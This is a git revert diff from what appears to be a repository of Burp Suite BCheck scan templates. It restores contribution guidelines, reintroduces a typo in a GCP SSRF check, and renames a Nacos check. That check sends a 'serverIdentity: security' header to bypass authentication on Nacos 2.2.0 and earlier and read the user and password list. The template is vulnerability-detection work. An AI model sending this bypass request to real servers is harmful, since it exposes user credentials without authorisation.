Revert "Clean up formatting to match new contribution guidelines."

This reverts commit c65e507.

CONTRIBUTING.md

@@ -16,13 +16,9 @@ Please note we have a code of conduct, please follow it in all your interactions
 1. Where possible, please ONLY link to the primary research
 2. Please ensure all metadata fields are completed.
 3. Please ensure the BCheck is syntactically valid.
-4. Please ensure your filename is correctly formatted:
-    - should be lower-kebab-case
-    - should end in .bcheck
-    - should only contain a-z0-9- 
-5. Please ensure the BCheck is formatted correctly.
+4. Please ensure the BCheck is formatted correctly.
     - Indentation is four spaces, not tabs.
-6. Please ensure the BCheck is optimized.
+5. Please ensure the BCheck is optimized.
     - No run for each on single items.
     - Avoid excessive nested if blocks. Instead, use a more complex predicate. 
     - Use appropriate conditionals. I.e. avoid lazy matching. 

other/gcp.bcheck

@@ -18,7 +18,7 @@ given insertion point then
 					severity: high
 					confidence: firm
 					detail: "Leaked GCP Service Account Access Token via SSRF."
-					remediation: "Restrict access to the metadata url."
+					remediation: "Restrict access to the metadat url."
 			end if
 		end if
 

other/nacos/nacos-serveridentity-bypass.bcheck → other/nacos/Nacos-severidentity-bypass.bcheck

@@ -1,27 +1,27 @@
-metadata:
-    language: v1-beta
-    name: "Nacos ServerIdentity Bypass"
-    description: "Nacos <= 2.2.0 - ServerIdentity Bypass"
-    tags: "Unauthorized","Nacos"
-    author: "JaveleyQAQ"
-
-run for each:
-    nacos_detect = 
-        "/nacos/v1/auth/users?pageNo=1&pageSize=9&search=accurate&accessToken=",
-        "/v1/auth/users?pageNo=1&pageSize=9&search=accurate&accessToken="
-
-given host then
-    send request called nacos:
-        method: "GET"
-        path: {nacos_detect}
-        appending headers:
-            "serverIdentity": "security"
-
-    if {nacos.response.status_code} is "200" and "application/json" in {nacos.response.headers} and "\"username\":" in {nacos.response.body} and "\"password\":" in {nacos.response.body} then
-        report issue:
-            severity: high
-            confidence: certain
-            detail: `Nacos <= 2.2.0 platform adds "serverIdentity: security" to the header to bypass authentication and view the list of users. \nhttps://github.com/MrWQ/vulnerability-paper/blob/55e4dca8b537b93c6b90008af2f7eddd68271f2c/bugs/%E9%82%A3%E4%BA%9B%E5%B9%B4%E6%88%91%E4%BB%AC%E4%B8%80%E8%B5%B7%E8%BF%BD%E8%BF%87%E7%9A%84%20Nacos.md`
-            remediation: `Change the default value of token.secret.key in the application.properties file. Refer to https://nacos.io/zh-cn/docs/v2/guide/user/auth.html`
-    end if
-
+metadata:
+    language: v1-beta
+    name: "Nacos ServerIdentity Bypass"
+    description: "Nacos <= 2.2.0 - ServerIdentity Bypass"
+    tags: "Unauthorized","Nacos"
+    author: "JaveleyQAQ"
+
+run for each:
+    nacos_detect = 
+        "/nacos/v1/auth/users?pageNo=1&pageSize=9&search=accurate&accessToken=",
+        "/v1/auth/users?pageNo=1&pageSize=9&search=accurate&accessToken="
+
+given host then
+    send request called nacos:
+        method: "GET"
+        path: {nacos_detect}
+        appending headers:
+            "serverIdentity": "security"
+
+    if {nacos.response.status_code} is "200" and "application/json" in {nacos.response.headers} and "\"username\":" in {nacos.response.body} and "\"password\":" in {nacos.response.body} then
+        report issue:
+            severity: high
+            confidence: certain
+            detail: `Nacos <= 2.2.0 platform adds "serverIdentity: security" to the header to bypass authentication and view the list of users. \nhttps://github.com/MrWQ/vulnerability-paper/blob/55e4dca8b537b93c6b90008af2f7eddd68271f2c/bugs/%E9%82%A3%E4%BA%9B%E5%B9%B4%E6%88%91%E4%BB%AC%E4%B8%80%E8%B5%B7%E8%BF%BD%E8%BF%87%E7%9A%84%20Nacos.md`
+            remediation: `Change the default value of token.secret.key in the application.properties file. Refer to https://nacos.io/zh-cn/docs/v2/guide/user/auth.html`
+    end if
+